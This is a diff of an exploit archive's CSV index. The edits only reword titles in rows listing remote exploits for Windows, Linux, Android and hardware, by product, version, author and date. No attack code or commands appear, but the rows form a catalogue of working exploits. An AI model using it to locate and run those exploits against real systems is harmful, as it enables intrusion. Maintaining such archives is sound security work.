+900,platforms/linux/remote/900.c,"Smail 3.2.0.120 - Heap Overflow",2005-03-28,infamous41md,linux,remote,25
 902,platforms/linux/remote/902.c,"mtftpd 0.0.3 - Remote Code Execution",2005-03-29,darkeagle,linux,remote,21
 903,platforms/linux/remote/903.c,"Cyrus imapd 2.2.4 < 2.2.8 - (imapmagicplus) Remote Exploit",2005-03-29,crash-x,linux,remote,143
 906,platforms/windows/remote/906.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (2)",2005-04-01,class101,windows,remote,20031
@@ -9374,7 +9376,7 @@ id,file,description,date,author,platform,type,port
 3636,platforms/windows/remote/3636.txt,"Microsoft Windows - Animated Cursor '.ani' Remote Exploit (eeye patch Bypass)",2007-04-01,jamikazu,windows,remote,0
 3650,platforms/windows/remote/3650.c,"Frontbase 4.2.7 - Authenticated Remote Buffer Overflow (2.2)",2007-04-02,Heretic2,windows,remote,0
 3651,platforms/windows/remote/3651.txt,"Microsoft Windows - Animated Cursor '.ani' Universal Exploit Generator",2007-04-03,"YAG KOHHA",windows,remote,0
-3654,platforms/multiple/remote/3654.pl,"HP Mercury Quality Center 9.0 build 9.1.0.4352 - SQL Execution Exploit",2007-04-03,"Isma Khan",multiple,remote,0
+3654,platforms/multiple/remote/3654.pl,"HP Mercury Quality Center 9.0 build 9.1.0.4352 - SQL Execution",2007-04-03,"Isma Khan",multiple,remote,0
 3661,platforms/windows/remote/3661.pl,"HP Mercury Quality Center - Spider90.ocx ProgColor Overflow",2007-04-04,ri0t,windows,remote,0
 3662,platforms/windows/remote/3662.rb,"AOL SuperBuddy - ActiveX Control Remote Code Execution (Metasploit)",2007-04-04,"Krad Chad",windows,remote,0
 3675,platforms/windows/remote/3675.rb,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow (2)",2007-04-06,"Umesh Wanve",windows,remote,21
@@ -9838,7 +9840,7 @@ id,file,description,date,author,platform,type,port
 7910,platforms/windows/remote/7910.html,"WOW Web On Windows ActiveX Control 2 - Remote Code Execution",2009-01-29,"Michael Brooks",windows,remote,0
 7912,platforms/windows/remote/7912.txt,"Microsoft Internet Explorer 7 - Clickjacking",2009-01-29,UzmiX,windows,remote,0
 7913,platforms/windows/remote/7913.pl,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow",2009-01-29,SkD,windows,remote,21
-7915,platforms/hardware/remote/7915.txt,"Motorola Wimax modem CPEi300 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2009-01-29,"Usman Saeed",hardware,remote,0
+7915,platforms/hardware/remote/7915.txt,"Motorola Wimax modem CPEi300 - File Disclosure / Cross-Site Scripting",2009-01-29,"Usman Saeed",hardware,remote,0
 7918,platforms/windows/remote/7918.txt,"ManageEngine Firewall Analyzer 5 - Cross-Site Request Forgery / Cross-Site Scripting",2009-01-29,"Michael Brooks",windows,remote,0
 7919,platforms/windows/remote/7919.txt,"Profense Web Application Firewall 2.6.2 - Cross-Site Request Forgery / Cross-Site Scripting",2009-01-29,"Michael Brooks",windows,remote,0
 7920,platforms/hardware/remote/7920.txt,"D-Link VoIP Phone Adapter - Cross-Site Scripting / Cross-Site Request Forgery Remote Firmware Overwrite",2009-01-29,"Michael Brooks",hardware,remote,0
@@ -9846,7 +9848,7 @@ id,file,description,date,author,platform,type,port
 7926,platforms/windows/remote/7926.pl,"Amaya Web Editor 11 - Remote Overwrite (SEH)",2009-01-30,LiquidWorm,windows,remote,0
 7928,platforms/windows/remote/7928.txt,"Synactis All_IN_THE_BOX ActiveX 3.0 - Null Byte File Overwrite",2009-01-30,DSecRG,windows,remote,0
 7935,platforms/windows/remote/7935.html,"Google Chrome 1.0.154.46 - (ChromeHTML://) Parameter Injection (PoC)",2009-01-30,waraxe,windows,remote,0
-7966,platforms/windows/remote/7966.txt,"navicopa WebServer 3.0.1 - (Buffer Overflow / Script Source Disclosure) Multiple Vulnerabilities",2009-02-03,e.wiZz!,windows,remote,0
+7966,platforms/windows/remote/7966.txt,"navicopa WebServer 3.0.1 - Buffer Overflow / Script Source Disclosure",2009-02-03,e.wiZz!,windows,remote,0
 7988,platforms/windows/remote/7988.pl,"Amaya Web Browser 11 - (bdo tag) Remote Stack Overflow (Windows XP)",2009-02-04,"Rob Carter",windows,remote,0
 7989,platforms/windows/remote/7989.pl,"Amaya Web Browser 11 - (bdo tag) Remote Stack Overflow (Windows Vista)",2009-02-04,"Rob Carter",windows,remote,0
 8022,platforms/hardware/remote/8022.txt,"3Com OfficeConnect Wireless Cable/DSL Router - Authentication Bypass",2009-02-09,ikki,hardware,remote,0
@@ -9909,7 +9911,7 @@ id,file,description,date,author,platform,type,port
 8463,platforms/windows/remote/8463.txt,"Zervit Web Server 0.02 - Directory Traversal",2009-04-16,e.wiZz!,windows,remote,0
 8518,platforms/windows/remote/8518.pl,"Femitter FTP Server 1.03 - Arbitrary File Disclosure",2009-04-22,Stack,windows,remote,0
 8525,platforms/windows/remote/8525.pl,"BolinTech DreamFTP Server 1.02 - 'users.dat' Arbitrary File Disclosure",2009-04-23,Cyber-Zone,windows,remote,0
-8537,platforms/windows/remote/8537.txt,"dwebpro 6.8.26 - (Directory Traversal/File Disclosure) Multiple Vulnerabilities",2009-04-27,"Alfons Luja",windows,remote,0
+8537,platforms/windows/remote/8537.txt,"dwebpro 6.8.26 - Directory Traversal / File Disclosure",2009-04-27,"Alfons Luja",windows,remote,0
 8554,platforms/windows/remote/8554.py,"Belkin Bulldog Plus - HTTP Server Remote Buffer Overflow",2009-04-27,His0k4,windows,remote,80
 8556,platforms/linux/remote/8556.c,"Linux Kernel 2.6.20 / 2.6.24 / 2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0
 8560,platforms/windows/remote/8560.html,"Autodesk IDrop - ActiveX Remote Code Execution",2009-04-28,Elazar,windows,remote,0
@@ -9962,7 +9964,7 @@ id,file,description,date,author,platform,type,port
 9066,platforms/hardware/remote/9066.txt,"ARD-9808 DVR Card Security Camera - Arbitrary Config Disclosure",2009-07-01,Septemb0x,hardware,remote,0
 9093,platforms/windows/remote/9093.txt,"Microsoft Windows live messenger plus! fileserver 1.0 - Directory Traversal",2009-07-09,joepie91,windows,remote,0
 9096,platforms/windows/remote/9096.txt,"Sun One WebServer 6.1 - JSP Source Viewing",2009-07-09,kingcope,windows,remote,0
-9106,platforms/windows/remote/9106.txt,"citrix xencenterweb - (Cross-Site Scripting / SQL Injection / Remote Code Execution) Multiple Vulnerabilities",2009-07-10,"Secure Network",windows,remote,0
+9106,platforms/windows/remote/9106.txt,"citrix xencenterweb - Cross-Site Scripting / SQL Injection / Remote Code Execution",2009-07-10,"Secure Network",windows,remote,0
 9108,platforms/windows/remote/9108.py,"Microsoft Internet Explorer 7 Video - ActiveX Remote Buffer Overflow",2009-07-10,"David Kennedy (ReL1K)",windows,remote,0
 9117,platforms/hardware/remote/9117.txt,"HTC / Windows Mobile OBEX FTP Service - Directory Traversal",2009-07-10,"Alberto Tablado",hardware,remote,0
 9128,platforms/windows/remote/9128.py,"Pirch IRC 98 Client - 'Response' Remote Buffer Overflow (SEH)",2009-07-12,His0k4,windows,remote,0
@@ -10150,8 +10152,8 @@ id,file,description,date,author,platform,type,port
 11138,platforms/windows/remote/11138.c,"Apple iTunes 8.1.x - (daap) Buffer Overflow Remote Exploit",2010-01-14,Simo36,windows,remote,0
 11151,platforms/windows/remote/11151.html,"Microsoft Internet Explorer - wshom.ocx ActiveX Control Remote Code Execution",2010-01-16,"germaya_x and D3V!L FUCKER",windows,remote,0
 11167,platforms/windows/remote/11167.py,"Microsoft Internet Explorer 6 - Aurora Exploit",2010-01-17,"Ahmed Obied",windows,remote,0
-11172,platforms/windows/remote/11172.html,"Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Exec (PoC)",2010-01-17,superli,windows,remote,0
-11173,platforms/windows/remote/11173.txt,"Trend Micro Web-Deployment ActiveX - Remote Exec (PoC)",2010-01-17,superli,windows,remote,0
+11172,platforms/windows/remote/11172.html,"Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Execution (PoC)",2010-01-17,superli,windows,remote,0
+11173,platforms/windows/remote/11173.txt,"Trend Micro Web-Deployment ActiveX - Remote Execution (PoC)",2010-01-17,superli,windows,remote,0
 11179,platforms/windows/remote/11179.rb,"Exploit EFS Software Easy Chat Server 2.2 - Buffer Overflow",2010-01-18,"John Babio",windows,remote,0
 11203,platforms/multiple/remote/11203.py,"Pidgin MSN 2.6.4 - File Download",2010-01-19,"Mathieu GASPARD",multiple,remote,0
 11204,platforms/windows/remote/11204.html,"AOL 9.5 - ActiveX Exploit (Heap Spray)",2010-01-20,Dz_attacker,windows,remote,0
@@ -10206,8 +10208,8 @@ id,file,description,date,author,platform,type,port
 12247,platforms/windows/remote/12247.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetFileClose Exploit (Universal)",2010-04-15,dookie,windows,remote,0
 12248,platforms/windows/remote/12248.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetConnectionEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0
 12250,platforms/windows/remote/12250.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetShareEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0
-12263,platforms/multiple/remote/12263.txt,"Apache OFBiz - SQL Remote Execution PoC Payload",2010-04-16,"Lucas Apa",multiple,remote,0
-12264,platforms/multiple/remote/12264.txt,"Apache OFBiz - FULLADMIN Creator PoC Payload",2010-04-16,"Lucas Apa",multiple,remote,0
+12263,platforms/multiple/remote/12263.txt,"Apache OFBiz - Remote Execution (via SQL Execution) (PoC)",2010-04-16,"Lucas Apa",multiple,remote,0
+12264,platforms/multiple/remote/12264.txt,"Apache OFBiz - Admin Creator (PoC)",2010-04-16,"Lucas Apa",multiple,remote,0
 12265,platforms/hardware/remote/12265.txt,"Iomega Home Media Network Hard Drive 2.038 < 2.061 - Unauthenticated File-system Access",2010-04-16,fizix610,hardware,remote,0
 12298,platforms/hardware/remote/12298.txt,"Huawei EchoLife HG520 - Remote Information Disclosure",2010-04-19,hkm,hardware,remote,0
 12304,platforms/multiple/remote/12304.txt,"Multi-Threaded HTTP Server 1.1 - Directory Traversal (1)",2010-04-20,chr1x,multiple,remote,0
@@ -10361,7 +10363,7 @@ id,file,description,date,author,platform,type,port
 15371,platforms/windows/remote/15371.txt,"yaws 1.89 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0
 15373,platforms/windows/remote/15373.txt,"mongoose Web server 2.11 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0
 15421,platforms/windows/remote/15421.html,"Microsoft Internet Explorer 6/7/8 - Memory Corruption",2010-11-04,ryujin,windows,remote,0
-15423,platforms/android/remote/15423.html,"Android 2.0 < 2.1 - Reverse Shell Exploit",2010-11-05,"MJ Keith",android,remote,0
+15423,platforms/android/remote/15423.html,"Google Android 2.0 < 2.1 - Reverse Shell Exploit",2010-11-05,"MJ Keith",android,remote,0
 15427,platforms/windows/remote/15427.txt,"WinTFTP Server Pro 3.1 - Directory Traversal",2010-11-05,"Yakir Wizman",windows,remote,0
 15437,platforms/windows/remote/15437.txt,"Quick Tftp Server Pro 2.1 - Directory Traversal",2010-11-05,"Yakir Wizman",windows,remote,0
 15438,platforms/windows/remote/15438.txt,"AT-TFTP Server 1.8 - Directory Traversal",2010-11-06,"Yakir Wizman",windows,remote,0
@@ -10369,7 +10371,7 @@ id,file,description,date,author,platform,type,port
 15449,platforms/linux/remote/15449.pl,"ProFTPd IAC 1.3.x - Remote Command Execution",2010-11-07,kingcope,linux,remote,0
 15450,platforms/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel Wylecial",windows,remote,21
 15505,platforms/hardware/remote/15505.txt,"Camtron CMNC-200 IP Camera - Directory Traversal",2010-11-13,"Trustwave's SpiderLabs",hardware,remote,0
-15548,platforms/android/remote/15548.html,"Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit",2010-11-15,"Itzhak Avraham",android,remote,0
+15548,platforms/android/remote/15548.html,"Google Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit",2010-11-15,"Itzhak Avraham",android,remote,0
 15617,platforms/multiple/remote/15617.txt,"VMware 2 Web Server - Directory Traversal",2010-11-25,clshack,multiple,remote,0
 15631,platforms/hardware/remote/15631.txt,"HP LaserJet - Directory Traversal in PJL Interface",2010-11-29,"n.runs AG",hardware,remote,0
 15648,platforms/windows/remote/15648.html,"J-Integra 2.11 - Remote Code Execution",2010-12-01,bz1p,windows,remote,0
@@ -10973,7 +10975,7 @@ id,file,description,date,author,platform,type,port
 16964,platforms/unix/remote/16964.rb,"Accellion File Transfer Appliance MPIPE2 - Command Execution (Metasploit)",2011-03-11,Metasploit,unix,remote,8812
 16970,platforms/windows/remote/16970.rb,"Kolibri HTTP Server 2.0 - HEAD Buffer Overflow (Metasploit)",2011-08-03,Metasploit,windows,remote,0
 16972,platforms/ios/remote/16972.txt,"iOS Checkview 1.1 - Directory Traversal",2011-03-14,kim@story,ios,remote,0
-16974,platforms/android/remote/16974.html,"Android 2.0 / 2.1 /2.1.1 - WebKit Use-After-Free Exploit",2011-03-14,"MJ Keith",android,remote,0
+16974,platforms/android/remote/16974.html,"Google Android 2.0/2.1/2.1.1 - WebKit Use-After-Free Exploit",2011-03-14,"MJ Keith",android,remote,0
 16984,platforms/windows/remote/16984.rb,"HP OpenView Performance Insight Server - Backdoor Account Code Execution (Metasploit)",2011-03-15,Metasploit,windows,remote,0
 16985,platforms/multiple/remote/16985.rb,"Adobe ColdFusion - Directory Traversal (Metasploit)",2011-03-16,Metasploit,multiple,remote,0
 16990,platforms/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader - Remote Code Execution (Metasploit)",2011-03-16,Metasploit,multiple,remote,0
@@ -13336,7 +13338,7 @@ id,file,description,date,author,platform,type,port
 26075,platforms/hardware/remote/26075.txt,"MobileIron Virtual Smartphone Platform - Privilege Escalation",2013-06-10,prdelka,hardware,remote,0
 26299,platforms/windows/remote/26299.c,"MultiTheftAuto 0.5 - Multiple Vulnerabilities",2005-09-26,"Luigi Auriemma",windows,remote,0
 26101,platforms/linux/remote/26101.txt,"EMC Navisphere Manager 6.x - Directory Traversal / Information Disclosure Vulnerabilities",2005-08-05,anonymous,linux,remote,0
-40874,platforms/android/remote/40874.txt,"Android - Inter-Process munmap with User-Controlled Size in android.graphics.Bitmap",2016-12-06,"Google Security Research",android,remote,0
+40874,platforms/android/remote/40874.txt,"Google Android - Inter-Process munmap with User-Controlled Size in android.graphics.Bitmap",2016-12-06,"Google Security Research",android,remote,0
 26123,platforms/multiple/remote/26123.rb,"Java - Web Start Double Quote Injection Remote Code Execution (Metasploit)",2013-06-11,Rh0,multiple,remote,0
 26134,platforms/windows/remote/26134.rb,"Synactis PDF In-The-Box - ConnectToSynactic Stack Buffer Overflow (Metasploit)",2013-06-11,Metasploit,windows,remote,0
 26135,platforms/multiple/remote/26135.rb,"Java Applet - Driver Manager Privileged toString() Remote Code Execution (Metasploit)",2013-06-11,Metasploit,multiple,remote,0
@@ -13400,7 +13402,7 @@ id,file,description,date,author,platform,type,port
 27073,platforms/windows/remote/27073.txt,"Microsoft Visual Studio - UserControl Remote Code Execution (2)",2006-01-12,priestmaster,windows,remote,0
 27095,platforms/multiple/remote/27095.txt,"Apache Tomcat / Geronimo 1.0 - Sample Script cal2.jsp time Parameter Cross-Site Scripting",2006-01-16,"Oliver Karow",multiple,remote,0
 27096,platforms/multiple/remote/27096.txt,"Apache Geronimo 1.0 - Error Page Cross-Site Scripting",2006-01-16,"Oliver Karow",multiple,remote,0
-27133,platforms/linux_mips/remote/27133.py,"ASUS RT-AC66U - 'acsd' Parameter Remote Command Execution",2013-07-27,"Jacob Holcomb",linux_mips,remote,0
+27133,platforms/linux_mips/remote/27133.py,"ASUS RT-AC66U - 'acsd' Parameter Remote Command Execution",2013-07-27,"Jacob Holcomb",linux_mips,remote,0
 27135,platforms/multiple/remote/27135.rb,"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution (Metasploit)",2013-07-27,Metasploit,multiple,remote,8080
 27150,platforms/linux/remote/27150.txt,"Mozilla Firefox 1.0/1.5 XBL - MOZ-BINDING Property Cross-Domain Scripting",2006-01-30,"Chris Thomas",linux,remote,0
 27181,platforms/multiple/remote/27181.txt,"IBM Lotus Domino 6.x/7.0 - iNotes JavaScript: Filter Bypass",2006-02-10,"Jakob Balle",multiple,remote,0
@@ -13869,7 +13871,7 @@ id,file,description,date,author,platform,type,port
 31076,platforms/linux/remote/31076.py,"MPlayer 1.0rc2 - 'demux_mov.c' Remote Code Execution",2008-02-04,"Felipe Manzano",linux,remote,0
 31078,platforms/hardware/remote/31078.txt,"2WIRE Routers - 'H04_POST' Access Validation",2008-01-30,"Oligarchy Oligarchy",hardware,remote,0
 31095,platforms/novell/remote/31095.txt,"Novell Groupwise 5.57e/6.5.7/7.0 Webaccess - Multiple Cross-Site Scripting Vulnerabilities",2008-01-31,"Frederic Loudet",novell,remote,0
-31106,platforms/multiple/remote/31106.txt,"WinComLPD Total 3.0.2.623 - (Buffer Overflow and Authentication Bypass) Multiple Vulnerabilities",2008-02-04,"Luigi Auriemma",multiple,remote,0
+31106,platforms/multiple/remote/31106.txt,"WinComLPD Total 3.0.2.623 - Buffer Overflow / Authentication Bypass",2008-02-04,"Luigi Auriemma",multiple,remote,0
 31113,platforms/windows/remote/31113.html,"GlobalLink 2.6.1.2 - 'HanGamePlugincn18.dll' ActiveX Control Multiple Buffer Overflow Vulnerabilities",2008-02-05,anonymous,windows,remote,0
 31118,platforms/windows/remote/31118.c,"Microsoft Works 8.0 - File Converter Field Length Remote Code Execution",2008-02-06,"Luigi Auriemma",windows,remote,0
 31119,platforms/multiple/remote/31119.txt,"TinTin++ / WinTin++ 1.97.9 - '#chat' Command Multiple Vulnerabilities",2008-02-06,"Luigi Auriemma",multiple,remote,0
@@ -13915,7 +13917,7 @@ id,file,description,date,author,platform,type,port
 31473,platforms/osx/remote/31473.html,"Apple Safari 3.1 - Window.setTimeout Variant Content Spoofing",2008-03-22,"Juan Pablo Lopez Yacubian",osx,remote,0
 31474,platforms/windows/remote/31474.py,"Mitsubishi Electric GB-50A - Multiple Remote Authentication Bypass Vulnerabilities",2008-03-22,"Chris Withers",windows,remote,0
 31479,platforms/php/remote/31479.txt,"Quick Classifieds 1.0 - index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,remote,0
-40354,platforms/android/remote/40354.txt,"Android - libutils UTF16 to UTF8 Conversion Heap Buffer Overflow",2016-09-08,"Google Security Research",android,remote,0
+40354,platforms/android/remote/40354.txt,"Google Android - libutils UTF16 to UTF8 Conversion Heap Buffer Overflow",2016-09-08,"Google Security Research",android,remote,0
 31518,platforms/linux/remote/31518.rb,"Pandora Fms - Remote Code Execution (Metasploit)",2014-02-07,Metasploit,linux,remote,8023
 31519,platforms/hardware/remote/31519.rb,"Android Browser and WebView addJavascriptInterface - Code Execution (Metasploit)",2014-02-07,Metasploit,hardware,remote,0
 31533,platforms/novell/remote/31533.txt,"Novell eDirectory 8.x - eMBox Utility 'edirutil' Command Unspecified",2008-03-25,"Nicholas Gregorie",novell,remote,0
@@ -14167,7 +14169,7 @@ id,file,description,date,author,platform,type,port
 33064,platforms/multiple/remote/33064.txt,"Google Chrome 0.3.154 - 'JavaScript:' URI in 'Refresh' Header Cross-Site Scripting",2009-06-03,MustLive,multiple,remote,0
 33066,platforms/windows/remote/33066.html,"Avax Vector 1.3 - 'avPreview.ocx' ActiveX Control Buffer Overflow",2009-06-06,Satan_HackerS,windows,remote,0
 33067,platforms/multiple/remote/33067.txt,"Winds3D Viewer 3 - 'GetURL()' Arbitrary File Download",2009-06-08,"Diego Juarez",multiple,remote,0
-33071,platforms/windows/remote/33071.txt,"McAfee ePolicy Orchestrator 4.6.0 < 4.6.5 - (ePowner) Multiple Vulnerabilities",2014-04-28,st3n,windows,remote,0
+33071,platforms/windows/remote/33071.txt,"McAfee ePolicy Orchestrator 4.6.0 < 4.6.5 - 'ePowner' Multiple Vulnerabilities",2014-04-28,st3n,windows,remote,0
 33078,platforms/multiple/remote/33078.txt,"HP ProCurve Threat Management Services - zl ST.1.0.090213 Module CRL Security Bypass",2009-06-13,anonymous,multiple,remote,0
 33079,platforms/multiple/remote/33079.txt,"Oracle Weblogic Server 10.3 - 'console-help.portal' Cross-Site Scripting",2009-06-14,"Alexandr Polyakov",multiple,remote,0
 33081,platforms/multiple/remote/33081.cpp,"Oracle 9i/10g Database - Remote Network Authentication",2009-06-14,"Dennis Yurichev",multiple,remote,0
@@ -14393,7 +14395,7 @@ id,file,description,date,author,platform,type,port
 34426,platforms/linux/remote/34426.txt,"uzbl 'uzbl-core' - '@SELECTED_URI' Mouse Button Bindings Command Injection",2010-08-05,Chuzz,linux,remote,0
 34431,platforms/linux/remote/34431.html,"Nagios XI - Multiple Cross-Site Request Forgery Vulnerabilities",2010-08-07,"Adam Baldwin",linux,remote,0
 34437,platforms/windows/remote/34437.txt,"Portable Document Format - Specification Signature Collision",2010-08-11,"Florian Zumbiehl",windows,remote,0
-34439,platforms/multiple/remote/34439.txt,"ServletExec - (Directory Traversal / Authentication Bypass) Multiple Vulnerabilities",2010-08-12,"Stefano Di Paola",multiple,remote,0
+34439,platforms/multiple/remote/34439.txt,"ServletExec - Directory Traversal / Authentication Bypass",2010-08-12,"Stefano Di Paola",multiple,remote,0
 34448,platforms/multiple/remote/34448.rb,"Mozilla Firefox - WebIDL Privileged JavaScript Injection (Metasploit)",2014-08-28,Metasploit,multiple,remote,0
 34461,platforms/multiple/remote/34461.py,"NRPE 2.15 - Remote Code Execution",2014-08-29,"Claudio Viviani",multiple,remote,0
 34462,platforms/windows/remote/34462.txt,"Microsoft Windows Kerberos - 'Pass The Ticket' Replay Security Bypass",2010-08-13,"Emmanuel Bouillon",windows,remote,0
@@ -14847,7 +14849,7 @@ id,file,description,date,author,platform,type,port
 38100,platforms/hardware/remote/38100.txt,"Multiple Fortinet FortiWeb Appliances - Multiple Cross-Site Scripting Vulnerabilities",2012-12-01,"Benjamin Kunz Mejri",hardware,remote,0
 38096,platforms/linux/remote/38096.rb,"Endian Firewall - Password Change Command Injection (Metasploit)",2015-09-07,Metasploit,linux,remote,10443
 38109,platforms/linux/remote/38109.pl,"Oracle MySQL / MariaDB - Insecure Salt Generation Security Bypass",2012-12-06,kingcope,linux,remote,0
-38124,platforms/android/remote/38124.py,"Android - 'Stagefright' Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote,0
+38124,platforms/android/remote/38124.py,"Google Android - 'Stagefright' Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote,0
 38203,platforms/linux/remote/38203.txt,"Schmid Watson Management Console - Directory Traversal",2013-01-09,"Dhruv Shah",linux,remote,0
 38151,platforms/windows/remote/38151.py,"Microsoft Windows Media Center - Command Execution (MS15-100)",2015-09-11,R-73eN,windows,remote,0
 38164,platforms/hardware/remote/38164.py,"Belkin Wireless Router Default - WPS PIN Security",2013-01-03,ZhaoChunsheng,hardware,remote,0
@@ -14858,7 +14860,7 @@ id,file,description,date,author,platform,type,port
 38196,platforms/php/remote/38196.rb,"CMS Bolt - Arbitrary File Upload (Metasploit)",2015-09-15,Metasploit,php,remote,80
 38206,platforms/windows/remote/38206.html,"Samsung Kies - Remote Buffer Overflow",2013-01-09,"High-Tech Bridge",windows,remote,0
 38221,platforms/java/remote/38221.rb,"ManageEngine OpManager - Remote Code Execution (Metasploit)",2015-09-17,Metasploit,java,remote,0
-38226,platforms/android/remote/38226.py,"Android - libstagefright Integer Overflow Remote Code Execution",2015-09-17,"Google Security Research",android,remote,0
+38226,platforms/android/remote/38226.py,"Google Android - libstagefright Integer Overflow Remote Code Execution",2015-09-17,"Google Security Research",android,remote,0
 38227,platforms/windows/remote/38227.txt,"Microsoft Lync 2010 4.0.7577.0 - User-Agent Header Handling Arbitrary Command Execution",2013-01-11,"Christopher Emerson",windows,remote,0
 38230,platforms/multiple/remote/38230.txt,"Apache OFBiz 10.4.x - Multiple Cross-Site Scripting Vulnerabilities",2013-01-18,"Juan Caillava",multiple,remote,0
 38233,platforms/hardware/remote/38233.txt,"F5 Networks BIG-IP - XML External Entity Injection",2013-01-21,anonymous,hardware,remote,0
@@ -14870,7 +14872,7 @@ id,file,description,date,author,platform,type,port
 38260,platforms/windows/remote/38260.php,"Konica Minolta FTP Utility 1.0 - Directory Traversal",2015-09-22,shinnai,windows,remote,21
 38302,platforms/multiple/remote/38302.rb,"w3tw0rk / Pitbul IRC Bot - Remote Code Execution (Metasploit)",2015-09-23,Metasploit,multiple,remote,6667
 38308,platforms/hardware/remote/38308.txt,"TP-Link TL-WR2543ND Router - Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-08,"Juan Manuel Garcia",hardware,remote,0
-38310,platforms/android/remote/38310.c,"Android 2.3.5 - PowerVR SGX Driver Information Disclosure",2011-11-03,"Geremy Condra",android,remote,0
+38310,platforms/android/remote/38310.c,"Google Android 2.3.5 - PowerVR SGX Driver Information Disclosure",2011-11-03,"Geremy Condra",android,remote,0
 38313,platforms/multiple/remote/38313.html,"Dell SonicWALL Scrutinizer - Multiple HTML Injection Vulnerabilities",2013-02-14,"Benjamin Kunz Mejri",multiple,remote,0
 38325,platforms/windows/remote/38325.txt,"Alt-N MDaemon WorldClient And WebAdmin - Cross-Site Request Forgery",2013-02-18,QSecure,windows,remote,0
 38330,platforms/windows/remote/38330.txt,"Photodex ProShow Producer - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2013-02-23,"Julien Ahrens",windows,remote,0
@@ -15030,7 +15032,7 @@ id,file,description,date,author,platform,type,port
 39314,platforms/hardware/remote/39314.c,"Aztech Modem Routers - Information Disclosure",2014-09-15,"Eric Fajardo",hardware,remote,0
 39316,platforms/hardware/remote/39316.pl,"Multiple Aztech Modem Routers - Session Hijacking",2014-09-15,"Eric Fajardo",hardware,remote,0
 39318,platforms/multiple/remote/39318.txt,"Laravel - 'Hash::make()' Function Password Truncation Security",2014-09-16,"Pichaya Morimoto",multiple,remote,0
-39328,platforms/android/remote/39328.rb,"Android ADB Debug Server - Remote Payload Execution (Metasploit)",2016-01-26,Metasploit,android,remote,5555
+39328,platforms/android/remote/39328.rb,"Google Android ADB Debug Server - Remote Payload Execution (Metasploit)",2016-01-26,Metasploit,android,remote,5555
 39437,platforms/hardware/remote/39437.rb,"D-Link DCS-930L - Authenticated Remote Command Execution (Metasploit)",2016-02-10,Metasploit,hardware,remote,0
 39439,platforms/jsp/remote/39439.txt,"File Replication Pro 7.2.0 - Multiple Vulnerabilities",2016-02-11,"Vantage Point Security",jsp,remote,0
 39499,platforms/linux/remote/39499.txt,"Proxmox VE 3/4 - Insecure Hostname Checking Remote Command Execution",2016-02-26,Sysdream,linux,remote,0
@@ -15046,7 +15048,7 @@ id,file,description,date,author,platform,type,port
 39631,platforms/multiple/remote/39631.txt,"Adobe Flash - Object.unwatch Use-After-Free Exploit",2016-03-29,"Google Security Research",multiple,remote,0
 39632,platforms/linux/remote/39632.py,"LShell 0.9.15 - Remote Code Execution",2012-12-30,drone,linux,remote,0
 39639,platforms/php/remote/39639.rb,"ATutor 2.2.1 - Directory Traversal / Remote Code Execution (Metasploit)",2016-03-30,Metasploit,php,remote,80
-39640,platforms/android/remote/39640.txt,"Android 5.0.1 - Metaphor Stagefright Exploit (ASLR Bypass)",2016-03-30,NorthBit,android,remote,0
+39640,platforms/android/remote/39640.txt,"Google Android 5.0.1 - Metaphor Stagefright Exploit (ASLR Bypass)",2016-03-30,NorthBit,android,remote,0
 39643,platforms/java/remote/39643.rb,"Apache Jetspeed - Arbitrary File Upload (Metasploit)",2016-03-31,Metasploit,java,remote,8080
 39645,platforms/multiple/remote/39645.php,"PHP 5.5.33 / 7.0.4 - SNMP Format String",2016-04-01,"Andrew Kramer",multiple,remote,0
 39693,platforms/unix/remote/39693.rb,"Dell KACE K1000 - Arbitrary File Upload (Metasploit)",2016-04-13,Metasploit,unix,remote,0
@@ -15085,7 +15087,7 @@ id,file,description,date,author,platform,type,port
 40113,platforms/linux/remote/40113.txt,"OpenSSHd 7.2p2 - Username Enumeration (PoC)",2016-07-18,"Eddie Harari",linux,remote,22
 40119,platforms/linux/remote/40119.md,"DropBearSSHD 2015.71 - Command Injection",2016-03-03,tintinweb,linux,remote,0
 40120,platforms/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution / Escalate Privileges",2016-07-17,b0yd,hardware,remote,0
-40846,platforms/android/remote/40846.html,"Android - 'BadKernel' Remote Code Execution",2016-11-28,"Guang Gong",android,remote,0
+40846,platforms/android/remote/40846.html,"Google Android - 'BadKernel' Remote Code Execution",2016-11-28,"Guang Gong",android,remote,0
 40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server-Side Include (SSI) Daemon Remote Format String",2016-07-19,bashis,multiple,remote,0
 40130,platforms/php/remote/40130.rb,"Drupal Module RESTWS 7.x - Remote PHP Code Execution (Metasploit)",2016-07-20,"Mehmet Ince",php,remote,80
 40136,platforms/linux/remote/40136.py,"OpenSSHd 7.2p2 - Username Enumeration",2016-07-20,0_o,linux,remote,22
@@ -15110,7 +15112,7 @@ id,file,description,date,author,platform,type,port
 40258,platforms/hardware/remote/40258.txt,"Cisco ASA 8.x - 'EXTRABACON' Authentication Bypass",2016-08-18,"Shadow Brokers",hardware,remote,161
